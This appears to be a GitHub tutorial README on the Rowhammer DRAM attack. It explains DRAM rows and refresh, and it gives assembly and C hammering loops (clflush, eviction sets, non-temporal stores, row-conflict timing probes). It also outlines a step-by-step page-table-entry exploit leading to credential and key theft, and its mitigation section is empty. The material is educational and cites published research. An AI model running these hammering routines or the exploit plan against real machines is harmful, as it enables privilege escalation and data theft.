hammertux/rowhammering

Contents

  1. How is DRAM Organised?
  2. Rowhammer
  3. How do we exploit bit flips?
  4. Post-Rowhammer Exploitation
  5. How do we mitigate Rowhammer?

How is DRAM Organised?

Intro

Usually, DRAM is connected to the CPU through a channel. Modern systems often have multiple channels (e.g., dual-channel). A DRAM module has two "sides" known as ranks: the front of the module is rank 0 and the back is rank 1. Each rank contains several chips, organised like the following:

DRAM Chip

A chip is subdivided into multiple banks, and each bank is subdivided into rows. Each row is usually 8KB in size and stores the actual data bits.

Reading from DRAM

When the CPU wants to access a row in memory (e.g., row 1), the row must first be activated: its contents are copied into the row buffer, and the value is then returned to the CPU from there. If the CPU wants to access a different row, the process starts again, evicting the previous row from the row buffer; i.e., the row buffer acts like a cache for rows. If the CPU accesses a row that is already in the row buffer, we have a row hit; if the row is NOT in the row buffer, there is a row conflict.

Refreshing the DRAM

Constraint from the physical world:

  • The cells leak charge over time.
  • The content of the cells has to be refreshed periodically to preserve data integrity.

To refresh the DRAM, the data from the cells is read into the row buffer and then written back to the cells. The DDR3 and DDR4 standards specify a maximum interval between refreshes (typically each row must be refreshed at least every 64ms) to guarantee data integrity.

Problem:

Cells leak charge faster upon proximate accesses. This means that if we repeatedly access rows adjacent to a victim row, the victim's cells leak charge faster, so the next scheduled refresh might come too late to preserve their contents.

Rowhammer

It's like breaking into an apartment by repeatedly slamming the neighbor's door until the vibrations open the door you were after. - Motherboard Vice

Say, for example, we want to flip bits in row 2: we can alternately activate rows 1 and 3. The whole activation process explained above is repeated for every access to the two rows. Done long enough, this can cause bit flips in row 2 (given that the memory module on the machine is vulnerable!).

How can we flip bits?

In order to exploit the rowhammer vulnerability, the memory accesses MUST be:

  • uncached (i.e., every access must physically reach the DRAM)
  • fast (we want as many accesses as possible between refreshes, i.e., we are racing against the next row refresh)
  • targeted (we need to hit two specific rows to get bit flips in the row between them)

The CPU cache lies between the CPU core and the DRAM, therefore only non-cached accesses actually reach the DRAM. There are two choices we can make:

  1. Flush the cache after having put the data in the cache.
  2. Don't put the data in the cache in the first place.

There are four access techniques to achieve the goal of having the next access being served directly from DRAM:

  1. CLFLUSH instruction (x86) (Kim et al. 2014)
  2. Cache eviction (Aweke et al. 2016)
  3. Non-temporal accesses (Qiao et al. 2016)
  4. Uncached memory (Veen et al. 2016)

In the first access technique we access the data (loading it into the cache), flush it from the cache with clflush, and then loop indefinitely in this reload-flush sequence until we get bit flips.

hammer:
  mov (X), %eax //Read from address X
  mov (Y), %ebx //Read from address Y
  clflush (X) //Flush cache for address X
  clflush (Y) //Flush cache for address Y
  jmp hammer //Loop indefinitely

For the "hammer" routine to work (i.e., cause bit flips), addresses X and Y MUST map to different rows of DRAM in the same bank.
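The same loop can be sketched in C using the compiler's cache-flush intrinsic. This is only a sketch mirroring the assembly above: the addresses, the iteration count, and the assumption that `x` and `y` already map to different rows of the same bank are all placeholders.

```c
#include <emmintrin.h>  /* _mm_clflush (SSE2) */
#include <stdint.h>

/* Sketch of the flush-based hammer loop. x and y are assumed to be
 * virtual addresses that map to different rows in the same DRAM bank;
 * iters stands in for "until we observe bit flips". */
static void hammer(volatile uint8_t *x, volatile uint8_t *y, long iters)
{
    for (long i = 0; i < iters; i++) {
        (void)*x;                      /* read X (fills the cache)     */
        (void)*y;                      /* read Y                       */
        _mm_clflush((const void *)x);  /* flush X: next read hits DRAM */
        _mm_clflush((const void *)y);  /* flush Y                      */
    }
}
```

On a vulnerable module this loop would be run for millions of iterations between two refreshes of the victim row.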

In the second access technique, Aweke et al. showed that an attacker can force the cache to evict its content by accessing memory addresses belonging to the same cache eviction set. On modern processors, last-level caches have high associativity (e.g., 8- or 16-way), so many memory accesses are required to evict a cache block, which slows down the rowhammering process (NOT ideal). The cache's replacement policy also matters in this approach (on modern caches it is usually NOT LRU).
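A minimal sketch of this flush-less eviction, assuming an eviction set for the target's cache set has already been constructed (building one is machine-specific and omitted here):

```c
#include <stdint.h>
#include <stddef.h>

/* Touch every member of an eviction set: enough accesses to addresses
 * that map to the same cache set as the target force the target's line
 * out of the LLC without using clflush. evset is assumed to be a
 * precomputed eviction set, one entry per cache way (or more, depending
 * on the replacement policy). */
static void evict(volatile uint8_t **evset, size_t n)
{
    for (size_t i = 0; i < n; i++)
        (void)*evset[i];
}
```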

In the third access technique we use non-temporal accesses, i.e., accesses to data that is used once and not again in the near future (low temporal locality), which therefore is not worth caching because it would be evicted anyway. Hence, we can use "Non-Temporal Access (NTA) instructions", which exist to minimise cache pollution, in order to bypass the cache. However, all non-temporal stores to a single address are combined in a Write-Combining (WC) buffer, and ONLY the LAST write goes to DRAM (no matter how many stores), so the store rate alone is not sufficient to "hammer". The trick (Qiao et al.) is to follow each non-temporal store with a regular cached access to the same address.

hammer:
  movnti %eax, (X)
  movnti %eax, (Y)
  mov %eax, (X)
  mov %eax, (Y)
  jmp hammer
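The loop above can likewise be sketched in C with the `_mm_stream_si32` intrinsic, which compiles to `movnti`; as before, `x` and `y` are assumed to map to different rows of the same bank.

```c
#include <immintrin.h>  /* _mm_stream_si32 -> movnti */

/* Sketch of non-temporal hammering (Qiao et al.): each movnti store is
 * followed by a regular store to the same address, which drains the
 * write-combining buffer so every iteration actually reaches DRAM. */
static void nta_hammer(int *x, int *y, long iters)
{
    for (long i = 0; i < iters; i++) {
        _mm_stream_si32(x, 1);  /* non-temporal store to X */
        _mm_stream_si32(y, 1);  /* non-temporal store to Y */
        *x = 1;                 /* regular access to the same address */
        *y = 1;
    }
}
```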

The fourth access technique is good especially on mobile devices:

  • On ARMv7 the flush instruction is privileged
  • Cache eviction seems to be too slow
  • On ARMv8 non-temporal stores are still cached in practice.

Since v4.0, Android has used the ION memory manager. Apps can use the /dev/ion interface to allocate uncached, physically contiguous memory, with no special privileges or permissions needed (Veen et al.).

How can we target accesses?

Using the physical address mapping

This method uses the knowledge of how the CPU's memory controller maps physical addresses to DRAM's row, column and bank numbers along with the knowledge of either:

  • The absolute physical addresses of memory we have access to (/proc/<PID>/pagemap)
  • The relative physical addresses of memory we have access to. Linux allows this through its support for "huge pages", which cover 2MB of contiguous physical address space per page. Whereas a normal 4KB page is smaller than a typical DRAM row, a 2MB page will typically cover multiple rows, some of which will be in the same bank.

Kim et al. take Y = X + 8MB

Another approach is to reverse engineer the mapping using timing analysis. We can exploit the timing difference between a row hit and a row conflict: if we observe a row conflict for an address pair, we know the two addresses MUST map to the same bank but to different rows (why? because the row buffer holds only one row at a time).
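A hedged sketch of such a timing probe on x86, using the cycle counter; the conflict threshold is machine-specific and would have to be calibrated by averaging over many runs.

```c
#include <x86intrin.h>  /* __rdtsc, _mm_clflush, _mm_mfence, _mm_lfence */
#include <stdint.h>

/* Time one uncached access pair. Averaged over many runs, pairs that
 * map to the same bank but different rows (row conflict) take measurably
 * longer than pairs in different banks. */
static uint64_t time_pair(volatile uint8_t *a, volatile uint8_t *b)
{
    _mm_clflush((const void *)a);  /* make both accesses miss the cache */
    _mm_clflush((const void *)b);
    _mm_mfence();                  /* flushes complete before timing starts */
    uint64_t t0 = __rdtsc();
    (void)*a;
    (void)*b;
    _mm_lfence();                  /* loads retire before reading the counter */
    return __rdtsc() - t0;
}
```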

Random address selection

Features like /proc/<PID>/pagemap and "huge pages" are not available on every system (they are Linux-specific). Another approach is to choose address pairs at random. We can allocate a very large block of memory (e.g., 1GB) and then pick random virtual addresses within that block. On a machine with 16 DRAM banks, there is a 1/16 chance that the chosen addresses fall in the same bank. We can increase the chances of successful row hammering by modifying the hammer routine to hammer more addresses per loop iteration.
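The random-pair strategy can be sketched as follows; the cache-line alignment and the use of `rand()` are illustrative assumptions, not part of any published exploit.

```c
#include <stdint.h>
#include <stdlib.h>

/* Pick a random cache-line-aligned address pair within a large block
 * (e.g., a 1GB allocation, as in the text). On a machine with 16 banks,
 * roughly 1 pair in 16 lands in the same bank, so many pairs must be
 * tried, or more addresses hammered per loop iteration. */
static void pick_pair(uint8_t *block, size_t size,
                      volatile uint8_t **x, volatile uint8_t **y)
{
    *x = block + (((size_t)rand() % size) & ~(size_t)0x3F);
    *y = block + (((size_t)rand() % size) & ~(size_t)0x3F);
}
```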

Double-sided hammering

Research has shown that to increase the chances of getting bit flips in row N, it is better to row-hammer both its direct neighbors (i.e., rows (N-1) and (N+1)) rather than hammering one neighbor and a more distant row. This is called double-sided hammering.

Double-sided hammering, however, is more complicated, because an attacker has to know or guess the offset, in physical address space, between two rows that are adjacent and in the same bank. This offset has been dubbed the row offset.

Doing double-sided hammering requires us to pick physically-contiguous pages, e.g., via /proc/<PID>/pagemap or "huge pages".
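In code, given a guessed row offset, the two aggressor addresses simply bracket the victim. The 256KB value below is purely an illustrative guess; the real row offset depends on the DRAM geometry and the memory controller's mapping.

```c
#include <stdint.h>

/* Double-sided hammering targets the rows directly above and below the
 * victim. ROW_OFFSET is the guessed physical-address distance between
 * adjacent same-bank rows; 256KB is an assumption, not a universal value. */
#define ROW_OFFSET (256UL * 1024)

static void aggressors(uintptr_t victim, uintptr_t *above, uintptr_t *below)
{
    *above = victim - ROW_OFFSET;  /* row N-1 */
    *below = victim + ROW_OFFSET;  /* row N+1 */
}
```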

How do we exploit bit flips?

Even though the bit flips produced by rowhammering seem random, they follow highly reproducible patterns: if hammering a certain memory location x has produced a bit flip before, the probability p that hammering x flips the same bit again is extremely high.

Exploitation through PTEs

Page Table Entries

A 64-bit Page Table Entry (PTE) usually has the following format:

PTE Format

A PTE has the following status bits:

  • P (bit 0): Indicates whether the page is present in physical memory.
  • RW (bit 1): Read-only or read-write access permission for reachable pages.
  • US (bit 2): User or kernel (supervisor) mode access permission for reachable pages.
  • WT (bit 3): Write-through or write-back policy.
  • UC (bit 4): Caching enabled or disabled.
  • R (bit 5): Reference bit (set by MMU on reads & writes, cleared in software).
  • D (bit 6): Dirty bit set if the page is written to.
  • S (bit 7): Size bit (Usually 4KB or 4MB for Level 1 PTEs only).
  • G (bit 8): Global bit set to avoid eviction from TLB on task switch.
  • X/NX (bit 63): No eXecute bit.

As we can see from the diagram above, bits 9-11 and bits 52-62 are ignored, so a bit flip in those ranges would simply be ignored by the CPU. Bits 12-51 hold the physical page number. Each 4KB page table consists of 2^9 = 512 such entries.
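The status bits above can be written down as bit masks; the names follow the list above rather than any particular kernel's headers.

```c
#include <stdint.h>

/* x86-64 PTE status bits as described above. */
#define PTE_P   (1ULL << 0)   /* present         */
#define PTE_RW  (1ULL << 1)   /* writable        */
#define PTE_US  (1ULL << 2)   /* user-accessible */
#define PTE_WT  (1ULL << 3)   /* write-through   */
#define PTE_UC  (1ULL << 4)   /* cache disabled  */
#define PTE_R   (1ULL << 5)   /* referenced      */
#define PTE_D   (1ULL << 6)   /* dirty           */
#define PTE_S   (1ULL << 7)   /* page size       */
#define PTE_G   (1ULL << 8)   /* global          */
#define PTE_NX  (1ULL << 63)  /* no-execute      */

/* Bits 12-51 hold the physical page number. */
#define PTE_PFN_MASK 0x000FFFFFFFFFF000ULL

/* Extract the physical address of the page a PTE points to. */
static inline uint64_t pte_phys(uint64_t pte) { return pte & PTE_PFN_MASK; }
```

A flip in the PFN bits redirects the mapping to a different physical page, which is exactly what the PTE exploit below relies on.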

Managing Page Tables

A typical mapping of a virtual address space is something like:

Page Table Management

The aim of this exploit is to get access to a page table, which gives access to all of physical memory. The strategy for this exploit can be something as follows:

  1. Allocate a large chunk of memory.
  2. Search for locations prone to flipping.
  3. Check if they fall into the "right spot" (RW bit or physical page number) in a PTE to enable the exploit.
  4. Return that particular area of memory to the OS.
  5. Force the OS to reuse the memory for PTEs by allocating a lot of address space.
  6. Cause the bit flip (shift PTE to point into the page table).
  7. Abuse R/W access to all of physical memory.

Post-Rowhammer Exploitation

When scanning the entire physical memory, there are various operations we can do:

  1. Modify binary pages executed with root privileges (Xiao et al. 2016)
  2. Modify credential structs (Veen et al. 2016)
  3. Read Crypto keys (Xiao et al. 2016)
  4. Corrupt RSA signatures (Bhattacharya et al. 2016)
  5. Modify certificates.
  6. And More...

How do we mitigate Rowhammer?

Sources

  1. Google Project Zero Rowhammer
  2. RuhrSec 2017: "Rowhammer Attacks: A Walkthrough Guide", Dr. Clémentine Maurice & Daniel Gruss
  3. Drammer: Deterministic Rowhammer Attacks on Mobile Platforms
